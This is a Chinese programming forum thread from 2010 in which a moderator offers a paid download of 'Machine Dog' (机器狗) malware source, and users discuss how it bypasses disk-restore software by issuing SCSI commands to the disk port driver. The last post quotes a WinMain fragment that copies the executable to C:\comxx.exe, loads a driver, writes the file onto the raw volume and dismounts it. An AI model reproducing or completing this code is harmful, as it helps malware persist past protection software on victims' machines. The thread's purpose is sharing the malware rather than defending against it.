设为首页收藏本站
切换到窄版

 找回密码
 加入我们

QQ登录

只需一步,快速开始

搜索
紫水晶编程技术论坛 - 努力打造成全国最好的编程论坛»论坛广场 置顶区 WINDOWS核心编程 机器狗代码
返回列表 发新帖
查看: 10432|回复: 10

机器狗代码

 火... [复制链接]
乔丹二世

280

主题

203

回帖

0

精华

版主

积分
1808
发表于 2010-9-2 18:56:22 | 显示全部楼层 |阅读模式
本帖最后由 乔丹二世 于 2010-9-2 18:59 编辑

也是从PUDN上下载的
放在硬盘里独乐乐不如放到论坛上众乐乐
顺便赚点水晶币:victory:

经典版机器狗.rar

96.15 KB, 下载次数: 58

售价: 5 水晶币  [记录]

吃饭,是要给钱的。下载代码,也是要给钱的。

评分

参与人数 2水晶币 +15 收起 理由
马大哈 + 10 发帖辛苦.
ok100fen + 5 分享,就好

查看全部评分

回复

举报

ok100fen

90

主题

473

回帖

2

精华

钻石会员

积分
3261
发表于 2010-9-2 20:37:09 | 显示全部楼层
下载一个

再给你加点钱
回复

举报

a33287651
头像被屏蔽

27

主题

136

回帖

2

精华

铂金会员

积分
2257
发表于 2010-9-3 16:12:41 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

举报

马大哈

275

主题

3017

回帖

1

精华

管理员

嗷嗷叫的老马

积分
17064

论坛牛人贡献奖关注奖最佳版主进步奖人气王疯狂作品奖精英奖赞助论坛勋章乐于助人勋章

QQ
发表于 2010-9-3 19:20:12 | 显示全部楼层
传说中穿还原的东东......

那个时候把冰点,还原精灵啥的搞惨了.......
我就是嗷嗷叫的老马了......
回复

举报

364589886

23

主题

117

回帖

1

精华

银牌会员

积分
400
发表于 2010-9-8 21:41:08 | 显示全部楼层
我这几天就在处理这问题
我们的还原被第六代机器狗穿透了。。。。。
回复

举报

oopww

9

主题

210

回帖

0

精华

初来乍到

积分
904
发表于 2010-9-9 18:21:49 | 显示全部楼层
有什么特殊的地方没!?好像以前也看到一份。
http://hi.baidu.com/cfan_
回复

举报

364589886

23

主题

117

回帖

1

精华

银牌会员

积分
400
发表于 2010-9-14 23:23:22 | 显示全部楼层
这个直接就是SCSI命令去直接操作磁盘端口驱动而已,也没啥特别的。。。。绕过了磁盘类驱动,而多数还原(95%以上,估计)是基于磁盘卷设备的,所以,也就穿透了还原
回复

举报

马大哈

275

主题

3017

回帖

1

精华

管理员

嗷嗷叫的老马

积分
17064

论坛牛人贡献奖关注奖最佳版主进步奖人气王疯狂作品奖精英奖赞助论坛勋章乐于助人勋章

QQ
发表于 2010-9-16 10:34:40 | 显示全部楼层
我这几天就在处理这问题
我们的还原被第六代机器狗穿透了。。。。。
364589886 发表于 2010-9-8 21:41



    。。。。。现在还在玩?这个作者真是。。。。。。。。
回复

举报

Tesla.Angela

857

主题

2632

回帖

2

精华

管理员

此生无悔入华夏,  长居日耳曼尼亚。  

积分
36130
发表于 2010-9-17 12:16:35 | 显示全部楼层
我觉得作者不是同一人了
我的一些与WINDOWS驱动开发相关的PoC(列表)
回复

举报

oopww

9

主题

210

回帖

0

精华

初来乍到

积分
904
发表于 2010-10-24 19:23:14 | 显示全部楼层
谁解释下到底是怎么回事啊!?
是怎么穿的呢?
把现有的一个文件复制到某个地方?
http://hi.baidu.com/cfan_
回复

举报

oopww

9

主题

210

回帖

0

精华

初来乍到

积分
904
发表于 2010-10-24 20:17:52 | 显示全部楼层
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
        CHAR szmyname[MAX_PATH];
        _tcsncpy(g_MyDriverName,_T("zzyyzz"),MAX_PATH);
        _hInstance = GetModuleHandle(NULL);
        m_hDevice = INVALID_HANDLE_VALUE;
         m_init = FALSE;
        GetModuleFileName(NULL,szmyname,MAX_PATH);
        CopyFile(szmyname,"C:\\comxx.exe",FALSE);
        loaddriver();
        if(MapDisk())
        {
                OutputDebugStringA("ok");
                HANDLE m_xxx;
                DWORD dwRet;

                if(CopyFile("C:\\comxx.exe","\\\\.\\yyy2\\comxx.exe",FALSE))
                        OutputDebugStringA("okok");
                else
                        OutputDebugStringA("fuck");
                m_xxx = CreateFile(
                        "\\\\.\\yyy2",
                        GENERIC_READ|GENERIC_WRITE,
                        0,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        0);
                FlushFileBuffers(m_xxx);
                if(DeviceIoControl(m_xxx,FSCTL_LOCK_VOLUME,NULL,0,NULL,0,&dwRet,0))
                {
                        if(DeviceIoControl(m_xxx,FSCTL_DISMOUNT_VOLUME,NULL,0,NULL,0,&dwRet,0))
                        {
                                DeviceIoControl(m_xxx,FSCTL_UNLOCK_VOLUME,NULL,0,NULL,0,&dwRet,0);
                        }
                }
                //DeviceIoControl(m_xxx,IOCTL_CLOSE_DISK,NULL,0,NULL,0,&dwRet,0);
                CloseHandle(m_xxx);
        }
        else
        {
                OutputDebugStringA("failed");
        }
        return 0;
}
这段是不是将"C:\\comxx.exe"穿还原的意思?
那要怎么样才可以实现启动呢?
http://hi.baidu.com/cfan_
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 加入我们

本版积分规则

快速回复 返回顶部 返回列表